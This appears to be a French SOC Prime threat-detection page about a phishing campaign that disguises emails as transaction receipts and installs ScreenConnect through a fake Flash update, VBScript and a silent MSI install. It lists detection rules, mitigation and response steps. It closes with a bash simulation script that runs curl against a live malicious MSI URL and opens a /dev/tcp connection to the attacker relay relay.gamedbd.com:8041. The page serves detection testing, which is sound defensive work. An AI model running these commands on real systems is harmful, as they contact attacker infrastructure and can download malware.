SOC Prime Bias: High

19 Aug 2026 07:43 UTC

Malware Phishing/Escroquerie : E-mails de Hameçonnage Déguisés en Reçus de Transaction

Author Photo
SOC Prime Team linkedin icon Suivre
Malware Phishing/Escroquerie : E-mails de Hameçonnage Déguisés en Reçus de Transaction
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Les acteurs malveillants envoient des emails de phishing qui usurpent l’identité d’employés d’entreprises américaines et incluent des pièces jointes déguisées en reçus de transaction. L’attaque utilise un PDF malveillant pour inciter les utilisateurs à télécharger une supposée mise à jour d’Adobe Flash Player qui lance en réalité un VBScript. Le script installe ensuite l’outil légitime de gestion à distance ScreenConnect pour établir un accès à distance persistant pour des activités ultérieures.

Enquête

AhnLab Security Intelligence Center (ASEC) a identifié la campagne en examinant le contenu des emails de phishing et le comportement du PDF joint. L’enquête a retracé la chaîne d’exécution du VBScript malveillant à la récupération en arrière-plan des charges utiles et à l’installation silencieuse d’un paquet MSI en utilisant curl.exe and msiexec.exe.

Atténuation

Les utilisateurs doivent être formés à reconnaître les tentatives de phishing impliquant des reçus de transaction inattendus et des demandes d’installation de mises à jour logicielles telles qu’Adobe Flash Player. Les organisations devraient restreindre l’exécution de VBScript et surveiller l’utilisation non autorisée d’outils de gestion à distance incluant ScreenConnect. Le listing d’applications autorisées peut également aider à empêcher l’exécution de paquets MSI inconnus ou non approuvés.

Réponse

Si une activité malveillante est détectée, le système affecté doit être isolé immédiatement pour éviter un accès à distance via ScreenConnect. Les répondants doivent mettre fin aux sessions actives associées à relay.Gamedbd.Com infrastructure et inspecter le registre pour les informations de session stockées. Une enquête médico-légale complète devrait également déterminer si un mouvement latéral ou une exfiltration de données a eu lieu via l’outil de gestion à distance.

Flux d’attaque

Nous mettons encore à jour cette partie.

Détections

LOLBAS WScript / CScript (via process_creation)

Équipe SOC Prime
18 août 2026

Logiciel alternatif d’accès / gestion à distance (via process_creation)

Équipe SOC Prime
18 août 2026

Infiltration / Exfiltration de données possible / C2 via des services / outils tiers (via proxy)

Équipe SOC Prime
18 août 2026

Infiltration / Exfiltration de données possible / C2 via des services / outils tiers (via dns)

Équipe SOC Prime
18 août 2026

IOCs (HashMd5) pour détecter : Malware Phishing/Scam : Emails de phishing déguisés en reçus de transaction

Règles SOC Prime AI
18 août 2026

Détection d’emails de phishing déguisés en reçus de transaction [Proxy]

Règles SOC Prime AI
18 août 2026

Email de phishing usurpant un reçu de transaction menant à l’installation d’un paquet MSI [Création de processus Windows]

Règles SOC Prime AI
18 août 2026

Exécution de la simulation

Prérequis : Le contrôle préalable Télémetrie & Baseline doit avoir réussi.

Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer exactement la télémétrie attendue par la logique de détection. Des exemples abstraits ou non liés mèneront à un mauvais diagnostic.

  • Récit d’attaque & Commandes : L’adversaire lance une campagne de phishing en envoyant un email concernant une transaction échouée. Le lien dirige la victime vers https://transaction-sucessful.vercel.app, qui héberge un faux reçu. Lorsque la victime clique sur « Télécharger le reçu », le navigateur tente de récupérer https://payment-six-eta.vercel.app/doc/sc.msi. Une fois la charge utile exécutée, elle tente d’établir une session d’accès à distance en se connectant au relais ScreenConnect à relay.gamedbd.com:8041. Cette séquence teste à la fois la détection basée sur l’URL et la logique de détection basée sur le domaine/port.

  • Script de test de régression :

    #!/bin/bash
    # Script de simulation pour déclencher la règle de détection Phishing/ScreenConnect
    
    echo "[+] Démarrage de la simulation : Test de détection Phishing/ScreenConnect"
    
    # 1. Simuler le téléchargement du MSI malveillant depuis l'URL Vercel
    echo "[+] Étape 1 : Simulation de connexion à l'URL Vercel malveillante..."
    curl -s -o /dev/null "https://payment-six-eta.vercel.app/doc/sc.msi"
    
    # 2. Simuler la connexion au domaine/port spécifique du relais ScreenConnect
    echo "[+] Étape 2 : Simulation de connexion au relais ScreenConnect malveillant..."
    # Nous utilisons /dev/tcp pour simuler une tentative de connexion sans nécessiter de listener réel
    timeout 2 bash -c 'cat < /dev/null > /dev/tcp/relay.gamedbd.com/8041' 2>/dev/null
    
    echo "[+] Simulation terminée. Vérifiez les alertes dans le SIEM."
  • Commandes de nettoyage :

    # Aucune artefact persistant n'est créé par cette simulation basée sur le réseau.
    # Si des fichiers locaux ont été téléchargés, ils doivent être supprimés :
    rm -f sc.msi
    echo "[+] Nettoyage terminé."